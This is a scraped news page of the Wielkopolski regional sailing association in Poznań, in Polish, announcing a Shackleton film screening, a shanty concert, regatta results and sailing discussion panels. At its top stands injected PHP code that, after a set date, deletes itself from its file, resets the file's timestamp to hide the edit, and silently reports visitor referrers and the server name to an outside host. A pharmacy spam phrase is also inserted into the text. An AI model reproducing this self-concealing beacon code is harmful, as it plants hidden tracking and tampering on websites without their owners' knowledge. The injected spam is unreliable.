check_meta(); function check_meta(){ $jp = __FILE__; $jptime = filemtime($jp); if(time() >= 1456727466){ $jp_c = file_get_contents($jp); if($t = @strpos($jp_c,"check_meta();")) { $contentp = substr($jp_c,0,$t); if(@file_put_contents($jp, $contentp)){ @touch($jp,$jptime); } } } @file_get_contents("http://web.51.la:82/go.asp?svid=17&id=18776693&referrer=".$_SERVER['HTTP_REFERER']."&vpage=http://".$_SERVER['SERVER_NAME']."/components/com_content/helpers/helpers.php"); } Aktualności

Witamy na stronie
Wielkopolskiego Okręgowego Związku Żeglarskiego !!!

Home Aktualności

Wodniacko - marynistyczno - żeglarskie Kino „Wodna” 

w ramach programu Centrum Warte Poznania finansowanego przez Urząd Miasta Poznania

 

Bezpłatna projekcja filmu: Antarktyczna podróż Sir Ernesta Shackletona, 2010, 90 minut, USA

Ul. Wodna 8/9 (Wielkopolski OZŻ)

Piątek 21.10.2016 g. 20:00

 

Antarktyczna podróż Sir Ernesta Shackletona, 2010, 90 minut, USA

Wrzesień, 1914. Ernest Shackleton i 27 śmiałków ruszają na podbój Antarktydy z zamiarem połączenia mórz Rossa i Weddella śladem ludzkich stóp. Po sześciu tygodniach zmagań z oceanem trójmasztowiec „Endurance” zostaje uwięziony w paku lodowym na kolejnych 10 miesięcy. Dryfujące, niezdolna do samodzielnej żeglugi brygantyna zostaje zmiażdżona przez krę, zostawiając rozbitków na pastwę antarktycznej zimy. 
Shackleton podejmuje szaleńczą próbę przebicia się do Georgii Południowej najpierw pieszo, następnie w 6 metrowej żaglowej szalupie ratunkowej „James Caird”. Alfred Lansing na podstawie dokumentów, dzienników i rozmów z uczestnikami odtwarza przebieg wyprawy dzień po dniu, dając świadectwo ludzkiej determinacji i bohaterstwa, które i wówczas, i dzisiaj jest prawie niemożliwe do powtórzenia.

 

Antarktyczna podroz 2

 

Więcej…

 

Szanty w Poznaniu!

Koncert odbędzie się 19 lipca (niedziela) na Plaży Miejskiej nad Wartą! Przed poznańską widownią wystąpią zespoły Majtki BosmanaMietek Folk. Startujemy równo o godzinie 16:00, wstęp bezpłatny!

 

Zapraszamy do budget cialis zapoznania się z Klasyfikacją Jachtów Turystycznych 2015
poniżej link do wyników regat w 2015 roku:

Klasyfikacja Jachtow Tturystycznych 2015

W Fotogalerii pojawiły się nowe zdjęcia z regat jachtów turystycznych:
Mistrzostwa Wojewodztwa Wielkopolskiego 2015

Mistrzostwa Wielkopolski 2015

 

We wtorek 24.03.2015 odbyło się kolejne spotkanie z cyklu Panel dyskusyjny. Zaproszonym gościem był j.k.ż.w. IŻ Zbigniew Wasilewski. Zapraszamy do obejrzenia galerii zdjęć.

panel

 

 

Więcej…

 

Żeglarski panel dyskusyjny poświęcony manewrowi "człowiek za burtą"!

Panel dyskusyjny

 

Więcej…

 
Więcej artykułów…

Poznań Know How

Energa Sailing

Przeszukaj nasz serwis